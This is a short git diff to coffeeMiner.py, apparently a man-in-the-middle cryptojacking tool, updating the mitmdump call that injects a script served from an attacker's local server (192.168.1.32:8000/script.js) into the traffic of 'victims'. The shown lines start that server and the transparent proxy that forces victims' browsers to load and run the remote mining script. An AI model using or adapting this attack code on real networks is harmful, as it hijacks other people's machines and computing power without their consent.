diff --git a/coffeeMiner.py b/coffeeMiner.py index 9ba4d7c..9d0390d 100644 --- a/coffeeMiner.py +++ b/coffeeMiner.py @@ -25,7 +25,7 @@ for victim in victims: os.system("xterm -hold -e 'python3 httpServer.py' &") # start the mitmproxy -os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T") +os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' --mode transparent") '''